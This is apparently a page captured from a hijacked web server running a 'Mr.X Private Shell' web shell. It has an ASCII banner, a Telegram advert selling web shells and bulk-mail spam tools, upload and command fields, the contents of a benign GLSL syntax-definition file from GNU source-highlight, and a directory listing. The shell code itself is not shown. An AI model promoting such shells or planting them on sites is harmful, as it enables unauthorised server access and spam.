__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
# definitions for glsl
include "c_comment.lang"

state preproc start '^[[:blank:]]*#(?:[[:blank:]]*include)' begin
        string delim "<" ">" 
        string delim "\"" "\"" escape "\\"
        include "c_comment.lang"
end

preproc = '^[[:blank:]]*#([[:blank:]]*[[:word:]]*)'

include "number.lang"

include "c_string.lang"

keyword = "attribute|const|uniform|varying",
  "centroid",
  "break|continue|do|for|while",
  "if|else",
  "in|out|inout",
  "invariant|discard|return|struct"

predef_var =
  "gl_BackColor|gl_BackLightModelProduct|gl_BackLightProduct|gl_BackMaterial",
  "gl_BackSecondaryColor|gl_ClipPlane|gl_ClipVertex|gl_Color|gl_DepthRange",
  "gl_DepthRangeParameters|gl_EyePlaneQ|gl_EyePlaneR|gl_EyePlaneS|gl_EyePlaneT",
  "gl_Fog|gl_FogColor|gl_FogFragCoord|gl_FogParameters",
  "gl_FragColor|gl_FragCoord|gl_FragData|gl_FragDepth|gl_FragFacing",
  "gl_FrontColor|gl_FrontLightModelProduct|gl_FrontLightProduct",
  "gl_FrontMaterial|gl_FrontSecondaryColor|gl_LightModel",
  "gl_LightModelParameters|gl_LightModelProducts|gl_LightProducts",
  "gl_LightSource|gl_LightSourceParameters|gl_MaterialParameters",
  "gl_MaxClipPlanes|gl_MaxCombinedTextureImageUnits|gl_MaxDrawBuffers",
  "gl_MaxFragmentUniformComponents|gl_MaxLights|gl_MaxTextureCoords",
  "gl_MaxTextureImageUnits|gl_MaxTextureUnits|gl_MaxVaryingFloats",
  "gl_MaxVertexAttributes|gl_MaxVertexTextureImageUnits|gl_MaxVertexUniformComponents",
  "gl_ModelViewMatrix|gl_ModelViewMatrixInverse|gl_ModelViewMatrixInverseTranspose",
  "gl_ModelViewMatrixTranspose|gl_ModelViewProjectionMatrix|gl_ModelViewProjectionMatrixInverse",
  "gl_ModelViewProjectionMatrixInverseTranspose|gl_ModelViewProjectionMatrixTranspose",
  "gl_MultiTexCoord0|gl_MultiTexCoord1|gl_MultiTexCoord2|gl_MultiTexCoord2",
  "gl_MultiTexCoord3|gl_MultiTexCoord4|gl_MultiTexCoord5|gl_MultiTexCoord6",
  "gl_MultiTexCoord7|gl_NormScale|gl_Normal|gl_NormalMatrix|gl_ObjectPlaneQ",
  "gl_ObjectPlaneR|gl_ObjectPlaneS|gl_ObjectPlaneT|gl_Point|gl_PointParameters",
  "gl_PointSize|gl_Position|gl_ProjectionMatrix|gl_ProjectionMatrixInverse",
  "gl_ProjectionMatrixInverseTranspose|gl_ProjectionMatrixTranspose",
  "gl_SecondaryColor|gl_SecondaryColor|gl_TexCoord|gl_TextureEnvColor",
  "gl_TextureMatrix|gl_TextureMatrixInverse|gl_TextureMatrixInverseTranspose",
  "gl_TextureMatrixTranspose|gl_Vertex"

predef_var = `\.(ambient|diffuse|specular|position|halfVector|spotDirection|spotExponent|spotCutoff|spotCosCutoff)`

predef_var = `\.(constantAttenuation|linearAttenuation|quadraticAttenuation|sceneColor|emission|shininess)`

predef_var = `\.(fadeThresholdSize|distanceConstantAttenuation|distanceLinearAttenuation|distanceQuadraticAttenuation)`

predef_var = `\.([xyzw]{1,4}|[rgba]{1,4}|[stpq]{1,4}|near|far|diff|color|density|start|end|scale|size|sizeMin|sizeMax)`

predef_func = "radians|degrees|sin|cos|tan|asin|acos|atan",
 "pow|exp|log|exp2|log2|sqrt|inversesqrt",
 "abs|sign|floor|ceil|fract|mod|min|max|clamp|mix|step|smoothstep",
 "length|distance|dot|cross|normalize|ftransform|faceforward|reflect|refract",
 "matrixCompMult",
 "lessThan|lessThenEqual|greaterThan|greaterThanEqual|equal|notEqual",
 "any|all|not",
 "texture1D|texture1DProj|texture1DLod|texture1DProjLod",
 "texture2D|texture2DProj|texture2DLod|texture2DProjLod",
 "texture3D|texture3DProj|texture3DLod|texture3DProjLod",
 "textureCube|textureCubeLod",
 "shadow1D|shadow1DProj|shadow1DLod|shadow1DProjLod",
 "shadow2D|shadow2DProj|shadow2DLod|shadow2DProjLod",
 "dFdx|dFdy|fwidth|noise1|noise2|noise3|noise4"

type = "float|int|void|bool|true|false",
  "mat2|mat3|mat4",
  "mat2x2|mat2x3|mat2x4",
  "mat3x2|mat3x3|mat3x4",
  "mat4x2|mat4x3|mat4x4",
  "vec2|vec3|vec4|ivec2|ivec3|ivec4|bvec2|bvec3|bvec4",
  "sampler1D|sampler2D|sampler3D|samplercube",
  "sampler1Dshadow|sampler2Dshadow"

include "symbols.lang"

cbracket = "{|}"

include "function.lang"

Filemanager

Name Type Size Permission Actions
Hello.css File 284 B 0644
Hello2.css File 273 B 0644
ada.lang File 1010 B 0644
applescript.lang File 1.55 KB 0644
asm.lang File 2.52 KB 0644
awk.lang File 302 B 0644
bat.lang File 1.37 KB 0644
bib.lang File 142 B 0644
bison.lang File 75 B 0644
c.lang File 1010 B 0644
c_comment.lang File 521 B 0644
c_preprocessor.lang File 248 B 0644
c_string.lang File 175 B 0644
caml.lang File 680 B 0644
changelog.lang File 268 B 0644
clike_vardeclaration.lang File 157 B 0644
clipper.lang File 1.09 KB 0644
cobol.lang File 3.12 KB 0644
coffeescript.lang File 1.01 KB 0644
conf.lang File 308 B 0644
cpp.lang File 1.22 KB 0644
cpp2html.css File 467 B 0644
csharp.lang File 872 B 0644
css.lang File 322 B 0644
css_common.outlang File 328 B 0644
d.lang File 1.52 KB 0644
default.css File 1.45 KB 0644
default.lang File 315 B 0644
default.style File 1.73 KB 0644
desktop.lang File 236 B 0644
diff.lang File 805 B 0644
docbook.outlang File 734 B 0644
erlang.lang File 4.07 KB 0644
errors.lang File 412 B 0644
esc.outlang File 949 B 0644
esc.style File 660 B 0644
esc256.outlang File 1.14 KB 0644
esc256.style File 679 B 0644
extreme_comment.lang File 138 B 0644
extreme_comment2.lang File 158 B 0644
extreme_comment3.lang File 345 B 0644
feature.lang File 597 B 0644
fixed-fortran.lang File 81 B 0644
flex.lang File 890 B 0644
fortran.lang File 1.77 KB 0644
function.lang File 85 B 0644
glsl.lang File 3.79 KB 0644
go.lang File 1 KB 0644
groff_man.outlang File 506 B 0644
groff_mm.outlang File 571 B 0644
groff_mm_color.outlang File 936 B 0644
groovy.lang File 758 B 0644
haskell.lang File 1.39 KB 0644
haskell_literate.lang File 208 B 0644
haxe.lang File 441 B 0644
html.lang File 460 B 0644
html.outlang File 448 B 0644
html5.outlang File 413 B 0644
html5_common.outlang File 590 B 0644
html_common.outlang File 584 B 0644
html_notfixed.outlang File 328 B 0644
html_ref.outlang File 288 B 0644
html_simple.lang File 1.43 KB 0644
htmlcss.outlang File 536 B 0644
htmltable.outlang File 293 B 0644
htmltablelinenum.outlang File 761 B 0644
ipxe.lang File 1.29 KB 0644
islisp.lang File 477 B 0644
java.lang File 714 B 0644
javadoc.outlang File 358 B 0644
javalog.lang File 585 B 0644
javalog.style File 1022 B 0644
javascript.lang File 1.01 KB 0644
json.lang File 578 B 0644
json.style File 151 B 0644
key_string.lang File 579 B 0644
lang.map File 3.05 KB 0644
langdef.lang File 485 B 0644
latex.lang File 1.18 KB 0644
latex.outlang File 1.04 KB 0644
latexcolor.outlang File 727 B 0644
ldap.lang File 163 B 0644
lilypond.lang File 5.45 KB 0644
lilypond.style File 408 B 0644
lisp.lang File 807 B 0644
log.lang File 1.66 KB 0644
logtalk.lang File 3.21 KB 0644
lsm.lang File 120 B 0644
lua.lang File 789 B 0644
m4.lang File 827 B 0644
makefile.lang File 1.16 KB 0644
manifest.lang File 250 B 0644
mediawiki.outlang File 720 B 0644
mono-alt.css File 315 B 0644
mono.css File 299 B 0644
nohilite.lang File 130 B 0644
number.lang File 124 B 0644
odf.outlang File 5.78 KB 0644
opa.lang File 1.81 KB 0644
outlang.lang File 499 B 0644
outlang.map File 522 B 0644
oz.lang File 726 B 0644
pascal.lang File 619 B 0644
pc.lang File 173 B 0644
perl.lang File 4.46 KB 0644
php.lang File 977 B 0644
po.lang File 69 B 0644
postscript.lang File 4.15 KB 0644
prolog.lang File 1.43 KB 0644
properties.lang File 150 B 0644
proto.lang File 656 B 0644
python.lang File 743 B 0644
r.lang File 768 B 0644
r.style File 194 B 0644
ruby.lang File 973 B 0644
rust.lang File 844 B 0644
s.lang File 72 B 0644
scala.lang File 815 B 0644
scheme.lang File 1.31 KB 0644
script_comment.lang File 96 B 0644
sexp.outlang File 72 B 0644
sh.lang File 1.32 KB 0644
sh_acid.css File 858 B 0644
sh_berries-dark.css File 868 B 0644
sh_berries-light.css File 868 B 0644
sh_bipolar.css File 866 B 0644
sh_blacknblue.css File 868 B 0644
sh_bright.css File 870 B 0644
sh_contrast.css File 862 B 0644
sh_darkblue.css File 866 B 0644
sh_darkness.css File 868 B 0644
sh_desert.css File 868 B 0644
sh_dull.css File 870 B 0644
sh_easter.css File 868 B 0644
sh_emacs.css File 716 B 0644
sh_golden.css File 868 B 0644
sh_greenlcd.css File 870 B 0644
sh_ide-anjuta.css File 716 B 0644
sh_ide-codewarrior.css File 718 B 0644
sh_ide-devcpp.css File 716 B 0644
sh_ide-eclipse.css File 714 B 0644
sh_ide-kdev.css File 716 B 0644
sh_ide-msvcpp.css File 716 B 0644
sh_kwrite.css File 716 B 0644
sh_matlab.css File 564 B 0644
sh_navy.css File 870 B 0644
sh_nedit.css File 864 B 0644
sh_neon.css File 864 B 0644
sh_night.css File 862 B 0644
sh_pablo.css File 868 B 0644
sh_peachpuff.css File 714 B 0644
sh_print.css File 784 B 0644
sh_rand01.css File 866 B 0644
sh_the.css File 718 B 0644
sh_typical.css File 868 B 0644
sh_vampire.css File 868 B 0644
sh_vim-dark.css File 718 B 0644
sh_vim.css File 795 B 0644
sh_whatis.css File 868 B 0644
sh_whitengrey.css File 716 B 0644
sh_zellner.css File 716 B 0644
slang.lang File 682 B 0644
sml.lang File 374 B 0644
source-highlight-esc.sh File 1017 B 0755
spec.lang File 182 B 0644
sql.lang File 1.37 KB 0644
src-hilite-lesspipe.sh File 490 B 0755
style.defaults File 425 B 0644
style.lang File 407 B 0644
style2.style File 164 B 0644
style3.style File 163 B 0644
symbols.lang File 111 B 0644
tcl.lang File 1003 B 0644
texinfo.lang File 696 B 0644
texinfo.outlang File 593 B 0644
texinfo.style File 237 B 0644
tml.lang File 1017 B 0644
tml_formatting.lang File 517 B 0644
tml_formatting_all.lang File 131 B 0644
tml_glue.lang File 65 B 0644
tml_macrolinks.lang File 468 B 0644
tml_macros.lang File 903 B 0644
tml_macros1.lang File 474 B 0644
tml_macros2.lang File 374 B 0644
tml_macrosdelayed1.lang File 539 B 0644
tml_macrosdelayed2.lang File 539 B 0644
tml_macrosdelayed3.lang File 393 B 0644
tml_macrotokens.lang File 160 B 0644
todo.lang File 52 B 0644
upc.lang File 299 B 0644
url.lang File 161 B 0644
vala.lang File 861 B 0644
vbscript.lang File 566 B 0644
vim.lang File 29.78 KB 0644
xhtml.css File 397 B 0644
xhtml.outlang File 600 B 0644
xhtml_common.outlang File 327 B 0644
xhtml_notfixed.outlang File 369 B 0644
xhtmlcss.outlang File 526 B 0644
xhtmltable.outlang File 295 B 0644
xml.lang File 406 B 0644
xorg.lang File 478 B 0644
zsh.lang File 1.89 KB 0644
Filemanager